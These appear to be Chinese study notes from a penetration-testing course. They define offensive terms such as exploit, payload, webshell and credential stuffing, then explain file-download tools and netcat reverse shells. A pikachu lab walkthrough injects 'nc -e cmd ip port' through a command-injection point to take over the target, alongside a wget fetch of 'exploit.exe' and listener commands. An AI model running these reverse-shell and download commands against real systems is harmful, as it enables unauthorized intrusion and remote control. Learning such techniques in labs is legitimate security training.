目录
1.前后端
2.POC/EXP
3.payload/shellcode
4.后门/webshell
5.木马/病毒
6.反弹
7.回显
8.跳板
9.黑白盒测试
10.暴力破解
11.社会工程学
12.撞库
13.ATT&CK(红蓝对抗框架)
二.操作系统----用途&命令&权限&用户&防火墙
1.windows/Linux常见命令
2.权限(用户~/文件~/服务~)
3.用户
4.防火墙--自带防火墙入站&出战-规则-策略-协议
*案例一.文件上传下载-->解决无图形化&解决数据传输
1.linux:wget curl python ruby perl java 等
2.widows:PowerShell Certutil Bitsadmin msiexec mshta rundl132 等
案例二.反弹shell命令-->解决数据回显&解决数据通讯
1.回显
补充:内网-外网
结合案例一.防火墙绕过-正向连接&反向连接&内网服务器
实战:(pikachu靶场)(利用工具nc(netcat))
详细网页:https://www.cnblogs.com/sunny11/p/13583083.html
前端为客户端,客户(用户)可以看到的内容。
后端为服务端,有一些程序处理客户端的需求并返回。前端发起请求,需要指定后端的ip端口和地址,才可以找到对应的程序进行处理。
POC:全称 ' Proof of Concept ',中文 ' 概念验证 ' ,常指一段漏洞证明的代码。(代码是否存在)
EXP:全称 ' Exploit ',中文 ' 利用 ',指利用系统漏洞进行攻击的动作。(每个漏洞都有其自己的EXP)
Payload:中文 ' 有效载荷
',指成功exploit之后,真正在目标系统执行的代码或指令。
Shellcode:
简单翻译 ' shell代码 ',是Payload的一种,由于其建立正向/反向shell而得名。
一段可被操作系统无需特别定位处理的指令,通常在利用软件漏洞后执行的恶意代码,shellcode为二进制的机器码,因为经常让攻击者获得shell而得名。
后门(统称):
这是一种形象的比喻,入侵者在利用某些方法成功的控制了目标主机后,可以在对方的系统中植入特定的程序,或者是修改某些设置,用于访问、查看或者控制这台主机。
这些改动表面上是很难被察觉的,就好象是入侵者偷偷的配了一把主人房间的钥匙,或者在不起眼处修了一条按到,可以方便自身随意进出。
通常大多数木马程序都可以被入侵者用于创建后门(BackDoor)。
Webshell:
就是以asp、php、jsp或者cgi等网页文件形式存在的一种命令执行环境,也可以将其称做是一种网页后门,可以上传下载文件,查看数据库,执行任意程序命令等。
木马:多用来控制电脑,获取数据等。
病毒:具有破坏性
。
有人发现,防火墙对于连入的连接往往会进行非常严格的过滤,但是对于连出的连接却疏于防范。 于是,利用这一特性,反弹端口型软件的服务端(被控制端)会主动连接客户端(控制端),就给人“被控制端主动连接控制端的假象,让人麻痹大意。
(权限问题,用其他地方去控制)
(我输入命令后能看见,有返回的数据)
一个具有辅助作用的机器,利用这个主机作为一个间接工具,来入侵其他主机,一般和肉鸡连用。
A->C B->C
A->B->C
黑:不知道代码,只有目标。
白:知道源代码等数据。
简称“爆破”。黑客对系统中账号的每一个可能的密码进行高度密集的自动搜索,从而破坏安全并获得对计算机的访问权限。
人性的弱点,常与apt攻击连用。
撞库是黑客通过收集互联网已泄露的用户和密码信息,生成对应的字典表,尝试批量登陆其他网站后,得到一系列可以登录的用户。 很多用户在不同网站使用的是相同的帐号密码,因此黑客可以通过获取用户在A网站的账户从而尝试登录B网址,这就可以理解为撞库攻击。
MITRE ATT&CK®
可参照概念等~专业
例子:(不绝对)
windows10-->个人计算机
windows2019-->服务器用机
【3】web安全入门篇-渗透测试中常用的命令_web安全入门篇 渗透测试中常用的命令-CSDN博客
文件~(右键-属性-安全-进行权限设置)
用户/组(此电脑-右键-管理查看)
例子:windows:
可通过whoami查看当前身份。-->我为:小灰邪\26255。
system(系统权限)系统自带的,不能被修改删除,不然电脑会出问题。
administrators(管理员权限)
user(创建新用户(普通))
windows-->windows defence
linux--->iptables
第三方的防火墙--->web防火墙等等
1.入站(严格)&出站(宽松):出去容易,进来难!
2.协议:一种限制,组织。---要走什么协议出入站。(防火墙-高级设置)
啊啊啊!!! 自己搭建网站下载地址或ftp服务器--下载地址!!!!!!!!!!
文件操作快捷命令生成:[~]#棱角 ::Edge.Forum*
###代替访问,直接在小黑窗口输入命令进行下载文件等操作。
》碰到linux服务器,用以上命令进行操作,上传文件。
-o 新名
ls
weget http://xxxxxx/xxx/exploit.exe(网站上传的一个软件下载地址) 域名!!!www.xiaodi8.com!!!!!
dir
cd 目录
cd\
解决交互式问题。
--------------------判断命令成败------------------------------------执行命令后,有没有返回东西--------------------------------------------------
linux增添用户/修改密码:
#passwd 用户名
windows:
举例:(利用nc工具)
内网:学校,公司,家庭。虚拟机
外网:阿里云。
外网找C的ip地址,C的ip地址到处都有。
外网!-->C
c-->外网 --可以控制阿里云,发送数据过去,要有数据回显,(除建立管道)
内网到处都有。
nc -e cmd ip地址 端口 --将cmd权限移交到外网上。 ip地址为网站的ip,ping一下。
ping 域名 --可以得到网站的ip地址。
nc -lvvp 端口
---浏览器搜的ip为网络出口地址(外网)
---ipconfig的ip地址为内网地址,到处都有
----都不行,怎么办?
让阿里云服务器找到内网出口,建一个策略,然后访问内网下的C。(下节课讲)
1、内网:
18内网 -> xiaodi8
79xiaodi8 !-> 内网
2、防火墙:
xiaodi8 <-> aliyun
xiaodi8防火墙 -> aliyun
aliyun !-> xiaodi8防火墙
防火墙:入站(严格)&出站(宽松)
目标是谁?谁找谁?谁为参照物?
1.正向连接
2.反向连接
发送:nc -e cmd ip port
进行监听:nc -lvvp port
(准备2台外网主机)
用nc
一个监听,一个反弹。反弹命令生成:[~]#棱角 ::Edge.Forum*
防火墙开,就不行了,反弹不了了。那怎么办???!!!!
---正反向问题!
例子: windows开防火墙 linux连接
入站严格啊。
windows:nc -e cmd ip port -->这就是出站,没问题啊。主动把数据交出去。
linux就监听到了。
(正反向看以谁为基准,不是绝对的。)
一般以自己的攻击主机为基准,我要攻击一台服务器,让服务器连我,这就是反向连接!!!
靶场漏洞很多,在线靶机/下载的
netcat 1.11 for Win32/Win64
fofa:黑暗引擎。搜集目标信息的。
目标:拿下pikachu服务器
1.判断目标为什么系统---信息搜集
可以命令试一下ipconfig/ifconfig
2.给目标下载nc工具---文件上传
ok,我们这里成功下载nc
3.然后 目标机执行:
。。。& n.exe -e cmd ip port
自己监听:nc -lvvp port
ok,成功拿下。
总结:我攻击pakachu服务器,通过反向连接
,成功拿到pikachu服务器。